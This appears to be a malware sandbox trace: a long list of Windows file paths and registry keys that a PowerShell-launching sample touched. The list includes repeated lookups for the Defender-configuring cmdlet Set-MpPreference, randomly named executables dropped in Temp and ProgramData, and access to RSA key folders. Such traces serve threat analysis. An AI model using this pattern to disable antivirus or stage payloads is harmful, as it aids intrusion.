C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.WSMan.Management.resources\Microsoft.WSMan.Management.resources.exe
C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\secur32.dll
C:\Windows\assembly\GAC_64\Microsoft.PowerShell.Security.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC\Microsoft.PowerShell.Security.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.Security.resources.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.Security.resources\Microsoft.PowerShell.Security.resources.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.Security.resources.exe
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.Security.resources\Microsoft.PowerShell.Security.resources.exe
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Data\accc3a5269658c8c47fe3e402ac4ac1c\System.Data.ni.dll
C:\Windows\assembly\GAC_64\System.Data\2.0.0.0__b77a5c561934e089\System.Data.INI
C:\Windows\assembly\GAC_64\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\profile.ps1
C:\Windows\sysnative\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1
C:\Users\user\Documents\WindowsPowerShell\profile.ps1
C:\Users\user\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
C:\Windows\sysnative\Set-MpPreference.ps1
C:\Windows\sysnative\Set-MpPreference.psm1
C:\Windows\sysnative\Set-MpPreference.psd1
C:\Windows\sysnative\Set-MpPreference.COM
C:\Windows\sysnative\Set-MpPreference.EXE
C:\Windows\sysnative\Set-MpPreference.BAT
C:\Windows\sysnative\Set-MpPreference.CMD
C:\Windows\sysnative\Set-MpPreference.VBS
C:\Windows\sysnative\Set-MpPreference.VBE
C:\Windows\sysnative\Set-MpPreference.JS
C:\Windows\sysnative\Set-MpPreference.JSE
C:\Windows\sysnative\Set-MpPreference.WSF
C:\Windows\sysnative\Set-MpPreference.WSH
C:\Windows\sysnative\Set-MpPreference.MSC
C:\Windows\sysnative\Set-MpPreference
C:\Windows\Set-MpPreference.ps1
C:\Windows\Set-MpPreference.psm1
C:\Windows\Set-MpPreference.psd1
C:\Windows\Set-MpPreference.COM
C:\Windows\Set-MpPreference.EXE
C:\Windows\Set-MpPreference.BAT
C:\Windows\Set-MpPreference.CMD
C:\Windows\Set-MpPreference.VBS
C:\Windows\Set-MpPreference.VBE
C:\Windows\Set-MpPreference.JS
C:\Windows\Set-MpPreference.JSE
C:\Windows\Set-MpPreference.WSF
C:\Windows\Set-MpPreference.WSH
C:\Windows\Set-MpPreference.MSC
C:\Windows\Set-MpPreference
C:\Windows\sysnative\wbem\Set-MpPreference.ps1
C:\Windows\sysnative\wbem\Set-MpPreference.psm1
C:\Windows\sysnative\wbem\Set-MpPreference.psd1
C:\Windows\sysnative\wbem\Set-MpPreference.COM
C:\Windows\sysnative\wbem\Set-MpPreference.EXE
C:\Windows\sysnative\wbem\Set-MpPreference.BAT
C:\Windows\sysnative\wbem\Set-MpPreference.CMD
C:\Windows\sysnative\wbem\Set-MpPreference.VBS
C:\Windows\sysnative\wbem\Set-MpPreference.VBE
C:\Windows\sysnative\wbem\Set-MpPreference.JS
C:\Windows\sysnative\wbem\Set-MpPreference.JSE
C:\Windows\sysnative\wbem\Set-MpPreference.WSF
C:\Windows\sysnative\wbem\Set-MpPreference.WSH
C:\Windows\sysnative\wbem\Set-MpPreference.MSC
C:\Windows\sysnative\wbem\Set-MpPreference
C:\Windows\sysnative\WindowsPowerShell\v1.0\Set-MpPreference.ps1
C:\Windows\sysnative\WindowsPowerShell\v1.0\Set-MpPreference.psm1
C:\Windows\sysnative\WindowsPowerShell\v1.0\Set-MpPreference.psd1
C:\Windows\sysnative\WindowsPowerShell\v1.0\Set-MpPreference.COM
C:\Windows\sysnative\WindowsPowerShell\v1.0\Set-MpPreference.EXE
C:\Windows\sysnative\WindowsPowerShell\v1.0\Set-MpPreference.BAT
C:\Windows\sysnative\WindowsPowerShell\v1.0\Set-MpPreference.CMD
C:\Windows\sysnative\WindowsPowerShell\v1.0\Set-MpPreference.VBS
C:\Windows\sysnative\WindowsPowerShell\v1.0\Set-MpPreference.VBE
C:\Windows\sysnative\WindowsPowerShell\v1.0\Set-MpPreference.JS
C:\Windows\sysnative\WindowsPowerShell\v1.0\Set-MpPreference.JSE
C:\Windows\sysnative\WindowsPowerShell\v1.0\Set-MpPreference.WSF
C:\Windows\sysnative\WindowsPowerShell\v1.0\Set-MpPreference.WSH
C:\Windows\sysnative\WindowsPowerShell\v1.0\Set-MpPreference.MSC
C:\Windows\sysnative\WindowsPowerShell\v1.0\Set-MpPreference
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.2952.15001147
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.2952.15001147
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.2952.15001147
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TQQ8PD6SYDSTEQFLYPJ7.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4e8ab.TMP
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.1628.15001881
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.1628.15001896
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.1628.15001896
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7K5UWNQAAA284NII014E.temp
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.624.15891007
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.624.15891007
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.624.15891007
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5ZNGV2JSA4OCNZIV8RKJ.temp
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.2056.15001974
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.2056.15001974
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.2056.15001974
C:\Windows\SysWOW64\propsys.dll
C:\Windows\sysnative\propsys.dll
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IDMN0LR05DQCP1U000ZS.temp
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.3004.15002941
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.3004.15002941
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.3004.15002941
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DY63D6T0HFBA1VQSZOV0.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4ed4d.TMP
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.1964.15003051
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.1964.15003051
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.1964.15003066
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0F89DDCRI5G2QC12KTBO.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf28611.TMP
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.920.15894096
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.920.15894096
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.920.15894096
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9ZOG3AYK6S7RIC8L0R98.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4f3f1.TMP
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.3132.15004767
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.3132.15004767
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.3132.15004767
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C2L4RYQ1YV2T42SO3QLN.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4f317.TMP
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.3640.15004595
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.3640.15004595
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.3640.15004595
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C6G2ARDY24RHA3XN3YP9.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf289c9.TMP
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.3112.15895047
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.3112.15895047
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.3112.15895047
C:\Windows\sysnative\data\
C:\Windows\Temp
C:\Users\user\AppData\Local\Temp\exlxo5YyAuKqn.exe
C:\ProgramData\ропрУВаЫсенорх.exe
C:\Users\user\AppData\Roaming\Microsoft
C:\Users\user\AppData\Roaming\Microsoft\Crypto
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-120665959-548228820-2376508522-1001
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\sysnative\en-US\sc.exe.mui
C:\Windows\sysnative\en-US\KERNELBASE.dll.mui
\Device\KsecDD
C:\
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db
C:\Users\desktop.ini
C:\Users
C:\Users\user
C:\Users\user\AppData
C:\Users\user\AppData\Roaming
C:\Users\user\AppData\Roaming\Microsoft\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
C:\Users\user\Desktop\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini
C:\ProgramData
C:\ProgramData\Microsoft\desktop.ini
C:\ProgramData\Microsoft
C:\ProgramData\Microsoft\Windows
C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini
C:\Users\Public\desktop.ini
C:\Users\Public
C:\Users\Public\Desktop\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
C:\Users\user\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
C:\Windows\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk\desktop.ini
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\powershell.exe.mui
C:\ProgramData\Microsoft\Windows\Start Menu\Programs
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell
\??\PIPE\srvsvc
C:\Windows
C:\Windows\sysnative
C:\Windows\sysnative\WindowsPowerShell
C:\Windows\sysnative\WindowsPowerShell\v1.0
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\00R5Q3FLPU2BRO922T83.temp
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks.dll
C:\Windows\winsxs\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_88df89932faf0bf6\msvcr80.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_64\index169.dat
C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\9469491f37d9c35b596968b206615309\mscorlib.ni.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\NativeImages_v2.0.50727_64\System\adff7dd9fe8e541775c46b6363401b22\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b023321bc53c20c10ccbbd8f78c82c82\Microsoft.PowerShell.ConsoleHost.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management.A#\009a09f5b2322bb8c5520dc5ddbb28bb\System.Management.Automation.ni.dll
C:\Windows\sysnative\l_intl.nls
C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Core\83e2f6909980da7347e7806d8c26670e\System.Core.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\ec50af274bf7a15fb59ac1f0d353b7ea\Microsoft.PowerShell.Commands.Diagnostics.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuratio#\fcf35536476614410e0b0bd0e412199e\System.Configuration.Install.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.WSMan.Man#\8cd73e65058ef6f77f36b62a74ec3344\Microsoft.WSMan.Management.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Transactions\051655963f24f9ade08486084c570086\System.Transactions.ni.dll
C:\Windows\assembly\GAC_64\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\cdf48153115fc0bb466f37b7dcad9ac5\Microsoft.PowerShell.Commands.Utility.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\9206dc8156588e608d405729c833edc5\Microsoft.PowerShell.Commands.Management.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b5a6a5ce3cd3d4dd2b151315c612aeff\Microsoft.PowerShell.Security.ni.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorjit.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\ee795155543768ea67eecddc686a1e9e\System.Xml.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management\c44929bde355680c886f8a52f5e22b81\System.Management.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.DirectorySer#\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\System.DirectoryServices.ni.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\GetEvent.types.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\types.ps1xml
C:\Windows\sysnative\tzres.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\WSMan.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\Certificate.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\FileSystem.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\Help.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\Registry.format.ps1xml
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Data\accc3a5269658c8c47fe3e402ac4ac1c\System.Data.ni.dll
C:\Windows\assembly\GAC_64\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TQQ8PD6SYDSTEQFLYPJ7.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7K5UWNQAAA284NII014E.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5ZNGV2JSA4OCNZIV8RKJ.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IDMN0LR05DQCP1U000ZS.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DY63D6T0HFBA1VQSZOV0.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0F89DDCRI5G2QC12KTBO.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9ZOG3AYK6S7RIC8L0R98.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C2L4RYQ1YV2T42SO3QLN.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C6G2ARDY24RHA3XN3YP9.temp
C:\ProgramData\\xd1\x80\xd0\xbe\xd0\xbf\xd1\x80\xd0\xa3\xd0\x92\xd0\xb0\xd0\xab\xd1\x81\xd0\xb5\xd0\xbd\xd0\xbe\xd1\x80\xd1\x85.exe
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-120665959-548228820-2376508522-1001\f58155b4b1d5a524ca0261c3ee99fb50_fb20aa52-1ec9-4d1f-b923-f6709499e604
C:\Users\user\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
\??\PIPE\srvsvc
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\00R5Q3FLPU2BRO922T83.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4e532.TMP
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TQQ8PD6SYDSTEQFLYPJ7.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4e8ab.TMP
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7K5UWNQAAA284NII014E.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5ZNGV2JSA4OCNZIV8RKJ.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IDMN0LR05DQCP1U000ZS.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DY63D6T0HFBA1VQSZOV0.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4ed4d.TMP
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0F89DDCRI5G2QC12KTBO.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf28611.TMP
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9ZOG3AYK6S7RIC8L0R98.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4f3f1.TMP
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C2L4RYQ1YV2T42SO3QLN.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4f317.TMP
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C6G2ARDY24RHA3XN3YP9.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf289c9.TMP
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4e532.TMP
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.2952.15001147
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.2952.15001147
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.2952.15001147
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4e8ab.TMP
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.1628.15001881
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.1628.15001896
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.1628.15001896
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7K5UWNQAAA284NII014E.temp
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.624.15891007
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.624.15891007
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.624.15891007
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5ZNGV2JSA4OCNZIV8RKJ.temp
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.2056.15001974
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.2056.15001974
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.2056.15001974
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IDMN0LR05DQCP1U000ZS.temp
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.3004.15002941
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.3004.15002941
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.3004.15002941
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4ed4d.TMP
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.1964.15003051
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.1964.15003051
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.1964.15003066
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf28611.TMP
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.920.15894096
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.920.15894096
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.920.15894096
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4f3f1.TMP
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.3132.15004767
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.3132.15004767
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.3132.15004767
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4f317.TMP
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.3640.15004595
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.3640.15004595
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.3640.15004595
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf289c9.TMP
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.3112.15895047
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.3112.15895047
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.3112.15895047
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PropertyBag
